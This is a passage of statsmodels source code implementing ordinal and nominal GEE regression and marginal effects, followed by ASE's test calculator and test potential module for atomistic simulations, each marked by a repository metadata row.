family = families.Binomial()
else:
if not isinstance(family, families.Binomial):
raise ValueError("ordinal GEE must use a Binomial family")
if cov_struct is None:
cov_struct = cov_structs.OrdinalIndependence()
endog, exog, groups, time, offset = self.setup_ordinal(
endog, exog, groups, time, offset)
super(OrdinalGEE, self).__init__(endog, exog, groups, time,
family, cov_struct, missing,
offset, dep_data, constraint)
def setup_ordinal(self, endog, exog, groups, time, offset):
"""
Restructure ordinal data as binary indicators so that they can
be analyzed using Generalized Estimating Equations.
"""
self.endog_orig = endog.copy()
self.exog_orig = exog.copy()
self.groups_orig = groups.copy()
if offset is not None:
self.offset_orig = offset.copy()
else:
self.offset_orig = None
offset = np.zeros(len(endog))
if time is not None:
self.time_orig = time.copy()
else:
self.time_orig = None
time = np.zeros((len(endog), 1))
exog = np.asarray(exog)
endog = np.asarray(endog)
groups = np.asarray(groups)
time = np.asarray(time)
offset = np.asarray(offset)
# The unique outcomes, except the greatest one.
self.endog_values = np.unique(endog)
endog_cuts = self.endog_values[0:-1]
ncut = len(endog_cuts)
nrows = ncut * len(endog)
exog_out = np.zeros((nrows, exog.shape[1]),
dtype=np.float64)
endog_out = np.zeros(nrows, dtype=np.float64)
intercepts = np.zeros((nrows, ncut), dtype=np.float64)
groups_out = np.zeros(nrows, dtype=groups.dtype)
time_out = np.zeros((nrows, time.shape[1]),
dtype=np.float64)
offset_out = np.zeros(nrows, dtype=np.float64)
jrow = 0
zipper = zip(exog, endog, groups, time, offset)
for (exog_row, endog_value, group_value, time_value,
offset_value) in zipper:
# Loop over thresholds for the indicators
for thresh_ix, thresh in enumerate(endog_cuts):
exog_out[jrow, :] = exog_row
endog_out[jrow] = (int(endog_value > thresh))
intercepts[jrow, thresh_ix] = 1
groups_out[jrow] = group_value
time_out[jrow] = time_value
offset_out[jrow] = offset_value
jrow += 1
exog_out = np.concatenate((intercepts, exog_out), axis=1)
# exog column names, including intercepts
xnames = ["I(y>%.1f)" % v for v in endog_cuts]
if type(self.exog_orig) == pd.DataFrame:
xnames.extend(self.exog_orig.columns)
else:
xnames.extend(["x%d" % k for k in range(1, exog.shape[1] + 1)])
exog_out = pd.DataFrame(exog_out, columns=xnames)
# Preserve the endog name if there is one
if type(self.endog_orig) == pd.Series:
endog_out = pd.Series(endog_out, name=self.endog_orig.name)
return endog_out, exog_out, groups_out, time_out, offset_out
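# Worked illustration of the expansion above (values hypothetical): with
# observed ordinal outcomes {1, 2, 3}, the cut points are 1 and 2, so each
# original row produces two rows with binary responses I(y > 1) and
# I(y > 2), together with two indicator columns acting as threshold-specific
# intercepts. A subject with y = 2 contributes one row with endog 1 (for the
# "I(y>1.0)" threshold) and one row with endog 0 (for "I(y>2.0)"), each
# carrying an unchanged copy of its covariates, group label, time and offset.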
def _starting_params(self):
exposure = getattr(self, "exposure", None)
model = GEE(self.endog, self.exog, self.groups,
time=self.time, family=families.Binomial(),
offset=self.offset, exposure=exposure)
result = model.fit()
return result.params
@Appender(_gee_fit_doc)
def fit(self, maxiter=60, ctol=1e-6, start_params=None,
params_niter=1, first_dep_update=0,
cov_type='robust'):
rslt = super(OrdinalGEE, self).fit(maxiter, ctol, start_params,
params_niter, first_dep_update,
cov_type=cov_type)
rslt = rslt._results # use unwrapped instance
res_kwds = dict(((k, getattr(rslt, k)) for k in rslt._props))
# Convert the GEEResults to an OrdinalGEEResults
ord_rslt = OrdinalGEEResults(self, rslt.params,
rslt.cov_params() / rslt.scale,
rslt.scale,
cov_type=cov_type,
attr_kwds=res_kwds)
# for k in rslt._props:
# setattr(ord_rslt, k, getattr(rslt, k))
# TODO: document or delete
return OrdinalGEEResultsWrapper(ord_rslt)
class OrdinalGEEResults(GEEResults):
__doc__ = (
"This class summarizes the fit of a marginal regression model"
"for an ordinal response using GEE.\n"
+ _gee_results_doc)
def plot_distribution(self, ax=None, exog_values=None):
"""
Plot the fitted probabilities of endog in an ordinal model,
for specified values of the predictors.
Parameters
----------
ax : AxesSubplot
An axes on which to draw the graph. If None, new
figure and axes objects are created
exog_values : array_like
A list of dictionaries, with each dictionary mapping
variable names to values at which the variable is held
fixed. The values P(endog=y | exog) are plotted for all
possible values of y, at the given exog value. Variables
not included in a dictionary are held fixed at the mean
value.
Examples
--------
We have a model with covariates 'age' and 'sex', and wish to
plot the probabilities P(endog=y | exog) for males (sex=0) and
for females (sex=1), as separate paths on the plot. Since
'age' is not included below in the map, it is held fixed at
its mean value.
>>> ev = [{"sex": 1}, {"sex": 0}]
>>> rslt.plot_distribution(exog_values=ev)
"""
from statsmodels.graphics import utils as gutils
if ax is None:
fig, ax = gutils.create_mpl_ax(ax)
else:
fig = ax.get_figure()
# If no covariate patterns are specified, create one with all
# variables set to their mean values.
if exog_values is None:
exog_values = [{}, ]
exog_means = self.model.exog.mean(0)
ix_icept = [i for i, x in enumerate(self.model.exog_names) if
x.startswith("I(")]
for ev in exog_values:
for k in ev.keys():
if k not in self.model.exog_names:
raise ValueError("%s is not a variable in the model"
% k)
# Get the fitted probability for each level, at the given
# covariate values.
pr = []
for j in ix_icept:
xp = np.zeros_like(self.params)
xp[j] = 1.
for i, vn in enumerate(self.model.exog_names):
if i in ix_icept:
continue
# User-specified value
if vn in ev:
xp[i] = ev[vn]
# Mean value
else:
xp[i] = exog_means[i]
p = 1 / (1 + np.exp(-np.dot(xp, self.params)))
pr.append(p)
pr.insert(0, 1)
pr.append(0)
pr = np.asarray(pr)
prd = -np.diff(pr)
ax.plot(self.model.endog_values, prd, 'o-')
ax.set_xlabel("Response value")
ax.set_ylabel("Probability")
ax.set_ylim(0, 1)
return fig
def _score_test_submodel(par, sub):
"""
Return transformation matrices for design matrices.
Parameters
----------
par : instance
The parent model
sub : instance
The sub-model
Returns
-------
qm : array_like
Matrix mapping the design matrix of the parent to the design matrix
for the sub-model.
qc : array_like
Matrix mapping the design matrix of the parent to the orthogonal
complement of the columnspace of the submodel in the columnspace
of the parent.
Notes
-----
Returns None, None if the provided submodel is not actually a submodel.
"""
x1 = par.exog
x2 = sub.exog
u, s, vt = np.linalg.svd(x1, 0)
v = vt.T
# Get the orthogonal complement of col(x2) in col(x1).
a, _ = np.linalg.qr(x2)
a = u - np.dot(a, np.dot(a.T, u))
x2c, sb, _ = np.linalg.svd(a, 0)
x2c = x2c[:, sb > 1e-12]
# x1 * qm = x2
ii = np.flatnonzero(np.abs(s) > 1e-12)
qm = np.dot(v[:, ii], np.dot(u[:, ii].T, x2) / s[ii, None])
e = np.max(np.abs(x2 - np.dot(x1, qm)))
if e > 1e-8:
return None, None
# x1 * qc = x2c
qc = np.dot(v[:, ii], np.dot(u[:, ii].T, x2c) / s[ii, None])
return qm, qc
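# Small numeric illustration of the transformations returned above.  The
# SimpleNamespace stand-ins are assumptions used only to exercise this helper,
# which reads nothing but the ``exog`` attribute of each model.
#
# >>> import numpy as np
# >>> from types import SimpleNamespace
# >>> rng = np.random.default_rng(1)
# >>> x1 = rng.normal(size=(20, 3))                   # parent design matrix
# >>> x2 = x1[:, :2]                                  # submodel: first two columns
# >>> qm, qc = _score_test_submodel(SimpleNamespace(exog=x1),
# ...                               SimpleNamespace(exog=x2))
# >>> np.allclose(x1 @ qm, x2)                        # x1 * qm reproduces x2
# True
# >>> np.allclose(x2.T @ (x1 @ qc), 0)                # x1 * qc is orthogonal to col(x2)
# True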
class OrdinalGEEResultsWrapper(GEEResultsWrapper):
pass
wrap.populate_wrapper(OrdinalGEEResultsWrapper, OrdinalGEEResults) # noqa:E305
class NominalGEE(GEE):
__doc__ = (
" Nominal Response Marginal Regression Model using GEE.\n" +
_gee_init_doc % {'extra_params': base._missing_param_doc,
'family_doc': _gee_nominal_family_doc,
'example': _gee_nominal_example,
'notes': _gee_nointercept})
def __init__(self, endog, exog, groups, time=None, family=None,
cov_struct=None, missing='none', offset=None,
dep_data=None, constraint=None, **kwargs):
endog, exog, groups, time, offset = self.setup_nominal(
endog, exog, groups, time, offset)
if family is None:
family = _Multinomial(self.ncut + 1)
if cov_struct is None:
cov_struct = cov_structs.NominalIndependence()
super(NominalGEE, self).__init__(
endog, exog, groups, time, family, cov_struct, missing,
offset, dep_data, constraint)
def _starting_params(self):
exposure = getattr(self, "exposure", None)
model = GEE(self.endog, self.exog, self.groups,
time=self.time, family=families.Binomial(),
offset=self.offset, exposure=exposure)
result = model.fit()
return result.params
def setup_nominal(self, endog, exog, groups, time, offset):
"""
Restructure nominal data as binary indicators so that they can
be analyzed using Generalized Estimating Equations.
"""
self.endog_orig = endog.copy()
self.exog_orig = exog.copy()
self.groups_orig = groups.copy()
if offset is not None:
self.offset_orig = offset.copy()
else:
self.offset_orig = None
offset = np.zeros(len(endog))
if time is not None:
self.time_orig = time.copy()
else:
self.time_orig = None
time = np.zeros((len(endog), 1))
exog = np.asarray(exog)
endog = np.asarray(endog)
groups = np.asarray(groups)
time = np.asarray(time)
offset = np.asarray(offset)
# The unique outcomes, except the greatest one.
self.endog_values = np.unique(endog)
endog_cuts = self.endog_values[0:-1]
ncut = len(endog_cuts)
self.ncut = ncut
nrows = len(endog_cuts) * exog.shape[0]
ncols = len(endog_cuts) * exog.shape[1]
exog_out = np.zeros((nrows, ncols), dtype=np.float64)
endog_out = np.zeros(nrows, dtype=np.float64)
groups_out = np.zeros(nrows, dtype=np.float64)
time_out = np.zeros((nrows, time.shape[1]),
dtype=np.float64)
offset_out = np.zeros(nrows, dtype=np.float64)
jrow = 0
zipper = zip(exog, endog, groups, time, offset)
for (exog_row, endog_value, group_value, time_value,
offset_value) in zipper:
# Loop over thresholds for the indicators
for thresh_ix, thresh in enumerate(endog_cuts):
u = np.zeros(len(endog_cuts), dtype=np.float64)
u[thresh_ix] = 1
exog_out[jrow, :] = np.kron(u, exog_row)
endog_out[jrow] = (int(endog_value == thresh))
groups_out[jrow] = group_value
time_out[jrow] = time_value
offset_out[jrow] = offset_value
jrow += 1
# exog names
if isinstance(self.exog_orig, pd.DataFrame):
xnames_in = self.exog_orig.columns
else:
xnames_in = ["x%d" % k for k in range(1, exog.shape[1] + 1)]
xnames = []
for tr in endog_cuts:
xnames.extend(["%s[%.1f]" % (v, tr) for v in xnames_in])
exog_out = pd.DataFrame(exog_out, columns=xnames)
# Preserve endog name if there is one
if isinstance(self.endog_orig, pd.Series):
endog_out = pd.Series(endog_out, name=self.endog_orig.name)
return endog_out, exog_out, groups_out, time_out, offset_out
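    # Sketch of the indicator expansion performed above, on tiny assumed data:
    # with response labels {0, 1, 2} there are ncut = 2 indicators, I(y == 0)
    # and I(y == 1), per observation, and exog is Kronecker-expanded so each
    # indicator gets its own copy of the covariates.
    #
    # >>> import numpy as np
    # >>> endog = np.array([0, 2, 1, 1])
    # >>> exog = np.arange(8.0).reshape(4, 2)
    # >>> groups = np.array([0, 0, 1, 1])
    # >>> model = NominalGEE(endog, exog, groups)
    # >>> model.endog.shape, model.exog.shape           # 4 obs * 2 cuts = 8 rows
    # ((8,), (8, 4))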
def mean_deriv(self, exog, lin_pred):
"""
Derivative of the expected endog with respect to the parameters.
Parameters
----------
exog : array_like
The exogeneous data at which the derivative is computed,
number of rows must be a multiple of `ncut`.
lin_pred : array_like
The values of the linear predictor, length must be multiple
of `ncut`.
Returns
-------
The derivative of the expected endog with respect to the
parameters.
"""
expval = np.exp(lin_pred)
# Reshape so that each row contains all the indicators
# corresponding to one multinomial observation.
expval_m = np.reshape(expval, (len(expval) // self.ncut,
self.ncut))
# The normalizing constant for the multinomial probabilities.
denom = 1 + expval_m.sum(1)
denom = np.kron(denom, np.ones(self.ncut, dtype=np.float64))
# The multinomial probabilities
mprob = expval / denom
# First term of the derivative: denom * expval' / denom^2 =
# expval' / denom.
dmat = mprob[:, None] * exog
# Second term of the derivative: -expval * denom' / denom^2
ddenom = expval[:, None] * exog
dmat -= mprob[:, None] * ddenom / denom[:, None]
return dmat
def mean_deriv_exog(self, exog, params, offset_exposure=None):
"""
Derivative of the expected endog with respect to exog for the
multinomial model, used in analyzing marginal effects.
Parameters
----------
exog : array_like
The exogeneous data at which the derivative is computed,
number of rows must be a multiple of `ncut`.
        params : array_like
            The model parameters; the linear predictor ``np.dot(exog, params)``
            must have length that is a multiple of `ncut`.
Returns
-------
The value of the derivative of the expected endog with respect
to exog.
Notes
-----
offset_exposure must be set at None for the multinomial family.
"""
if offset_exposure is not None:
warnings.warn("Offset/exposure ignored for the multinomial family",
ValueWarning)
lpr = np.dot(exog, params)
expval = np.exp(lpr)
expval_m = np.reshape(expval, (len(expval) // self.ncut,
self.ncut))
denom = 1 + expval_m.sum(1)
denom = np.kron(denom, np.ones(self.ncut, dtype=np.float64))
bmat0 = np.outer(np.ones(exog.shape[0]), params)
# Masking matrix
qmat = []
for j in range(self.ncut):
ee = np.zeros(self.ncut, dtype=np.float64)
ee[j] = 1
qmat.append(np.kron(ee, np.ones(len(params) // self.ncut)))
qmat = np.array(qmat)
qmat = np.kron(np.ones((exog.shape[0] // self.ncut, 1)), qmat)
bmat = bmat0 * qmat
dmat = expval[:, None] * bmat / denom[:, None]
expval_mb = np.kron(expval_m, np.ones((self.ncut, 1)))
expval_mb = np.kron(expval_mb, np.ones((1, self.ncut)))
dmat -= expval[:, None] * (bmat * expval_mb) / denom[:, None] ** 2
return dmat
@Appender(_gee_fit_doc)
def fit(self, maxiter=60, ctol=1e-6, start_params=None,
params_niter=1, first_dep_update=0,
cov_type='robust'):
rslt = super(NominalGEE, self).fit(maxiter, ctol, start_params,
params_niter, first_dep_update,
cov_type=cov_type)
if rslt is None:
warnings.warn("GEE updates did not converge",
ConvergenceWarning)
return None
rslt = rslt._results # use unwrapped instance
res_kwds = dict(((k, getattr(rslt, k)) for k in rslt._props))
# Convert the GEEResults to a NominalGEEResults
nom_rslt = NominalGEEResults(self, rslt.params,
rslt.cov_params() / rslt.scale,
rslt.scale,
cov_type=cov_type,
attr_kwds=res_kwds)
# TODO: document or delete
# for k in rslt._props:
# setattr(nom_rslt, k, getattr(rslt, k))
return NominalGEEResultsWrapper(nom_rslt)
class NominalGEEResults(GEEResults):
__doc__ = (
"This class summarizes the fit of a marginal regression model"
"for a nominal response using GEE.\n"
+ _gee_results_doc)
def plot_distribution(self, ax=None, exog_values=None):
"""
        Plot the fitted probabilities of endog in a nominal model,
for specified values of the predictors.
Parameters
----------
ax : AxesSubplot
An axes on which to draw the graph. If None, new
figure and axes objects are created
exog_values : array_like
A list of dictionaries, with each dictionary mapping
variable names to values at which the variable is held
fixed. The values P(endog=y | exog) are plotted for all
possible values of y, at the given exog value. Variables
not included in a dictionary are held fixed at the mean
value.
        Examples
        --------
We have a model with covariates 'age' and 'sex', and wish to
plot the probabilities P(endog=y | exog) for males (sex=0) and
for females (sex=1), as separate paths on the plot. Since
'age' is not included below in the map, it is held fixed at
its mean value.
>>> ex = [{"sex": 1}, {"sex": 0}]
        >>> rslt.plot_distribution(exog_values=ex)
"""
from statsmodels.graphics import utils as gutils
if ax is None:
fig, ax = gutils.create_mpl_ax(ax)
else:
fig = ax.get_figure()
# If no covariate patterns are specified, create one with all
# variables set to their mean values.
if exog_values is None:
exog_values = [{}, ]
link = self.model.family.link.inverse
ncut = self.model.family.ncut
k = int(self.model.exog.shape[1] / ncut)
exog_means = self.model.exog.mean(0)[0:k]
exog_names = self.model.exog_names[0:k]
exog_names = [x.split("[")[0] for x in exog_names]
params = np.reshape(self.params,
(ncut, len(self.params) // ncut))
for ev in exog_values:
exog = exog_means.copy()
for k in ev.keys():
if k not in exog_names:
raise ValueError("%s is not a variable in the model"
% k)
ii = exog_names.index(k)
exog[ii] = ev[k]
lpr = np.dot(params, exog)
pr = link(lpr)
pr = np.r_[pr, 1 - pr.sum()]
ax.plot(self.model.endog_values, pr, 'o-')
ax.set_xlabel("Response value")
ax.set_ylabel("Probability")
ax.set_xticks(self.model.endog_values)
ax.set_xticklabels(self.model.endog_values)
ax.set_ylim(0, 1)
return fig
class NominalGEEResultsWrapper(GEEResultsWrapper):
pass
wrap.populate_wrapper(NominalGEEResultsWrapper, NominalGEEResults) # noqa:E305
class _MultinomialLogit(Link):
"""
The multinomial logit transform, only for use with GEE.
Notes
-----
The data are assumed coded as binary indicators, where each
observed multinomial value y is coded as I(y == S[0]), ..., I(y ==
S[-1]), where S is the set of possible response labels, excluding
    the largest one. Therefore, functions in this class should only
    be called using vector arguments whose length is a multiple of |S|
= ncut, which is an argument to be provided when initializing the
class.
call and derivative use a private method _clean to trim p by 1e-10
so that p is in (0, 1)
"""
def __init__(self, ncut):
self.ncut = ncut
def inverse(self, lpr):
"""
Inverse of the multinomial logit transform, which gives the
expected values of the data as a function of the linear
predictors.
Parameters
----------
lpr : array_like (length must be divisible by `ncut`)
The linear predictors
Returns
-------
prob : ndarray
Probabilities, or expected values
"""
expval = np.exp(lpr)
denom = 1 + np.reshape(expval, (len(expval) // self.ncut,
self.ncut)).sum(1)
denom = np.kron(denom, np.ones(self.ncut, dtype=np.float64))
prob = expval / denom
return prob
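# Quick numeric check of the transform above, with assumed linear predictors
# for a single observation and ncut = 2 (three response categories).  The two
# fitted probabilities plus the omitted reference-category probability sum to
# one.
#
# >>> import numpy as np
# >>> link = _MultinomialLogit(ncut=2)
# >>> probs = link.inverse(np.array([0.5, -0.25]))
# >>> np.r_[probs, 1 - probs.sum()].round(3)
# array([0.481, 0.227, 0.292])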
class _Multinomial(families.Family):
"""
Pseudo-link function for fitting nominal multinomial models with
GEE. Not for use outside the GEE class.
"""
links = [_MultinomialLogit, ]
variance = varfuncs.binary
safe_links = [_MultinomialLogit, ]
def __init__(self, nlevels):
"""
Parameters
----------
nlevels : int
The number of distinct categories for the multinomial
distribution.
"""
self.initialize(nlevels)
def initialize(self, nlevels):
self.ncut = nlevels - 1
self.link = _MultinomialLogit(self.ncut)
class GEEMargins(object):
"""
Estimated marginal effects for a regression model fit with GEE.
Parameters
----------
results : GEEResults instance
The results instance of a fitted discrete choice model
args : tuple
Args are passed to `get_margeff`. This is the same as
results.get_margeff. See there for more information.
kwargs : dict
Keyword args are passed to `get_margeff`. This is the same as
results.get_margeff. See there for more information.
"""
def __init__(self, results, args, kwargs={}):
self._cache = {}
self.results = results
self.get_margeff(*args, **kwargs)
def _reset(self):
self._cache = {}
@cache_readonly
def tvalues(self):
_check_at_is_all(self.margeff_options)
return self.margeff / self.margeff_se
def summary_frame(self, alpha=.05):
"""
Returns a DataFrame summarizing the marginal effects.
Parameters
----------
alpha : float
Number between 0 and 1. The confidence intervals have the
probability 1-alpha.
Returns
-------
        frame : DataFrame
A DataFrame summarizing the marginal effects.
"""
_check_at_is_all(self.margeff_options)
from pandas import DataFrame
names = [_transform_names[self.margeff_options['method']],
'Std. Err.', 'z', 'Pr(>|z|)',
                 'Conf. Int. Low', 'Conf. Int. Hi.']
ind = self.results.model.exog.var(0) != 0 # True if not a constant
exog_names = self.results.model.exog_names
var_names = [name for i, name in enumerate(exog_names) if ind[i]]
table = np.column_stack((self.margeff, self.margeff_se, self.tvalues,
self.pvalues, self.conf_int(alpha)))
return DataFrame(table, columns=names, index=var_names)
@cache_readonly
def pvalues(self):
_check_at_is_all(self.margeff_options)
return stats.norm.sf(np.abs(self.tvalues)) * 2
def conf_int(self, alpha=.05):
"""
Returns the confidence intervals of the marginal effects
Parameters
----------
alpha : float
Number between 0 and 1. The confidence intervals have the
probability 1-alpha.
Returns
-------
conf_int : ndarray
An array with lower, upper confidence intervals for the marginal
effects.
"""
_check_at_is_all(self.margeff_options)
me_se = self.margeff_se
q = stats.norm.ppf(1 - alpha / 2)
lower = self.margeff - q * me_se
upper = self.margeff + q * me_se
return np.asarray(lzip(lower, upper))
def summary(self, alpha=.05):
"""
Returns a summary table for marginal effects
Parameters
----------
alpha : float
Number between 0 and 1. The confidence intervals have the
probability 1-alpha.
Returns
-------
Summary : SummaryTable
A SummaryTable instance
"""
_check_at_is_all(self.margeff_options)
results = self.results
model = results.model
title = model.__class__.__name__ + " Marginal Effects"
method = self.margeff_options['method']
top_left = [('Dep. Variable:', [model.endog_names]),
('Method:', [method]),
('At:', [self.margeff_options['at']]), ]
from statsmodels.iolib.summary import (Summary, summary_params,
table_extend)
exog_names = model.exog_names[:] # copy
smry = Summary()
const_idx = model.data.const_idx
if const_idx is not None:
exog_names.pop(const_idx)
J = int(getattr(model, "J", 1))
if J > 1:
yname, yname_list = results._get_endog_name(model.endog_names,
None, all=True)
else:
yname = model.endog_names
yname_list = [yname]
smry.add_table_2cols(self, gleft=top_left, gright=[],
yname=yname, xname=exog_names, title=title)
# NOTE: add_table_params is not general enough yet for margeff
# could use a refactor with getattr instead of hard-coded params
# tvalues etc.
table = []
conf_int = self.conf_int(alpha)
margeff = self.margeff
margeff_se = self.margeff_se
tvalues = self.tvalues
pvalues = self.pvalues
if J > 1:
for eq in range(J):
restup = (results, margeff[:, eq], margeff_se[:, eq],
tvalues[:, eq], pvalues[:, eq], conf_int[:, :, eq])
tble = summary_params(restup, yname=yname_list[eq],
xname=exog_names, alpha=alpha,
use_t=False,
skip_header=True)
tble.title = yname_list[eq]
# overwrite coef with method name
header = ['', _transform_names[method], 'std err', 'z',
'P>|z|',
'[%3.1f%% Conf. Int.]' % (100 - alpha * 100)]
tble.insert_header_row(0, header)
table.append(tble)
table = table_extend(table, keep_headers=True)
else:
restup = (results, margeff, margeff_se, tvalues, pvalues, conf_int)
table = summary_params(restup, yname=yname, xname=exog_names,
alpha=alpha, use_t=False, skip_header=True)
header = ['', _transform_names[method], 'std err', 'z',
'P>|z|', '[%3.1f%% Conf. Int.]' % (100 - alpha * 100)]
table.insert_header_row(0, header)
smry.tables.append(table)
return smry
def get_margeff(self, at='overall', method='dydx', atexog=None,
dummy=False, count=False):
self._reset() # always reset the cache when this is called
# TODO: if at is not all or overall, we can also put atexog values
# in summary table head
method = method.lower()
at = at.lower()
_check_margeff_args(at, method)
self.margeff_options = dict(method=method, at=at)
results = self.results
model = results.model
params = results.params
exog = model.exog.copy() # copy because values are changed
effects_idx = exog.var(0) != 0
const_idx = model.data.const_idx
if dummy:
_check_discrete_args(at, method)
dummy_idx, dummy = _get_dummy_index(exog, const_idx)
else:
dummy_idx = None
if count:
_check_discrete_args(at, method)
count_idx, count = _get_count_index(exog, const_idx)
else:
count_idx = None
# get the exogenous variables
exog = _get_margeff_exog(exog, at, atexog, effects_idx)
# get base marginal effects, handled by sub-classes
effects = model._derivative_exog(params, exog, method,
dummy_idx, count_idx)
effects = _effects_at(effects, at)
if at == 'all':
self.margeff = effects[:, effects_idx]
else:
# Set standard error of the marginal effects by Delta method.
margeff_cov, margeff_se = margeff_cov_with_se(
model, params, exog, results.cov_params(), at,
model._derivative_exog, dummy_idx, count_idx,
method, 1)
# do not care about at constant
self.margeff_cov = margeff_cov[effects_idx][:, effects_idx]
self.margeff_se = margeff_se[effects_idx]
self.margeff = effects[effects_idx]
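# Usage sketch for GEEMargins.  ``binom_results`` is an assumed GEEResults
# instance from a logistic (Binomial family) GEE fit; it is not defined in
# this module.  Marginal effects are computed "overall" with the "dydx"
# method and then summarized.
#
# >>> marg = GEEMargins(binom_results, ('overall', 'dydx'))
# >>> marg.summary_frame()
# >>> marg.conf_int(alpha=0.1)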
| jseabold/statsmodels | statsmodels/genmod/generalized_estimating_equations.py | Python | bsd-3-clause | 115,703 | ["Gaussian"] | 75321e719c37fbb8e2687169d3e332ea6b3e6cd230e27af8a88d3b39fdbae2c5 |
from math import pi
import pickle
import numpy as np
from ase.atoms import Atoms
from ase.parallel import world, rank, distribute_cpus
from ase.utils import opencew
def make_test_dft_calculation():
a = b = 2.0
c = 6.0
atoms = Atoms(positions=[(0, 0, c / 2)],
symbols='H',
pbc=(1, 1, 0),
cell=(a, b, c),
calculator=TestCalculator())
return atoms
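# Usage sketch for the helper above; the shapes come directly from
# TestCalculator.init (a 20x20x60 real-space grid and a single band).
#
# >>> atoms = make_test_dft_calculation()
# >>> calc = atoms.get_calculator()
# >>> calc.get_number_of_bands()
# 1
# >>> calc.get_pseudo_wave_function(band=0, kpt=0).shape
# (20, 20, 60)
# >>> len(calc.get_k_point_weights()) == len(calc.ibzk)
# True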
class TestCalculator:
def __init__(self, nk=8):
assert nk % 2 == 0
bzk = []
weights = []
ibzk = []
w = 1.0 / nk**2
for i in range(-nk + 1, nk, 2):
for j in range(-nk + 1, nk, 2):
k = (0.5 * i / nk, 0.5 * j / nk, 0)
bzk.append(k)
if i >= j > 0:
ibzk.append(k)
if i == j:
weights.append(4 * w)
else:
weights.append(8 * w)
assert abs(sum(weights) - 1.0) < 1e-12
self.bzk = np.array(bzk)
self.ibzk = np.array(ibzk)
self.weights = np.array(weights)
# Calculate eigenvalues and wave functions:
self.init()
def init(self):
nibzk = len(self.weights)
nbands = 1
V = -1.0
self.eps = 2 * V * (np.cos(2 * pi * self.ibzk[:, 0]) +
np.cos(2 * pi * self.ibzk[:, 1]))
self.eps.shape = (nibzk, nbands)
self.psi = np.zeros((nibzk, 20, 20, 60), complex)
phi = np.empty((2, 2, 20, 20, 60))
z = np.linspace(-1.5, 1.5, 60, endpoint=False)
for i in range(2):
x = np.linspace(0, 1, 20, endpoint=False) - i
for j in range(2):
y = np.linspace(0, 1, 20, endpoint=False) - j
r = (((x[:, None]**2 +
y**2)[:, :, None] +
z**2)**0.5).clip(0, 1)
phi = 1.0 - r**2 * (3.0 - 2.0 * r)
phase = np.exp(pi * 2j * np.dot(self.ibzk, (i, j, 0)))
self.psi += phase[:, None, None, None] * phi
def get_pseudo_wave_function(self, band=0, kpt=0, spin=0):
assert spin == 0 and band == 0
return self.psi[kpt]
def get_eigenvalues(self, kpt=0, spin=0):
assert spin == 0
return self.eps[kpt]
def get_number_of_bands(self):
return 1
def get_k_point_weights(self):
return self.weights
def get_number_of_spins(self):
return 1
def get_fermi_level(self):
return 0.0
class TestPotential:
def get_forces(self, atoms):
E = 0.0
R = atoms.positions
F = np.zeros_like(R)
for a, r in enumerate(R):
D = R - r
d = (D**2).sum(1)**0.5
x = d - 1.0
E += np.vdot(x, x)
d[a] = 1
F -= (x / d)[:, None] * D
self.energy = 0.25 * E
return F
def get_potential_energy(self, atoms):
self.get_forces(atoms)
return self.energy
def get_stress(self, atoms):
raise NotImplementedError
def numeric_force(atoms, a, i, d=0.001):
"""Evaluate force along i'th axis on a'th atom using finite difference.
This will trigger two calls to get_potential_energy(), with atom a moved
plus/minus d in the i'th axial direction, respectively.
"""
p0 = atoms.positions[a, i]
atoms.positions[a, i] += d
eplus = atoms.get_potential_energy()
atoms.positions[a, i] -= 2 * d
eminus = atoms.get_potential_energy()
atoms.positions[a, i] = p0
return (eminus - eplus) / (2 * d)
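# Consistency sketch: for a small assumed cluster, the analytic forces from
# TestPotential should agree with the finite-difference estimate returned by
# numeric_force (to roughly O(d**2)).  This assumes the classic
# calculator-attachment interface of this ASE version.
#
# >>> atoms = Atoms('H3', positions=[[0, 0, 0], [1.1, 0, 0], [0, 1.2, 0]])
# >>> atoms.set_calculator(TestPotential())
# >>> f_analytic = atoms.get_forces()[0, 0]
# >>> f_numeric = numeric_force(atoms, 0, 0)
# >>> abs(f_analytic - f_numeric) < 1e-4
# True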
| askhl/ase | ase/calculators/test.py | Python | gpl-2.0 | 3,631 | ["ASE"] | b05f0b50bd9eb1fb33a44df5a496db2e96a72a9f9ae15143dfbac120edd6871a |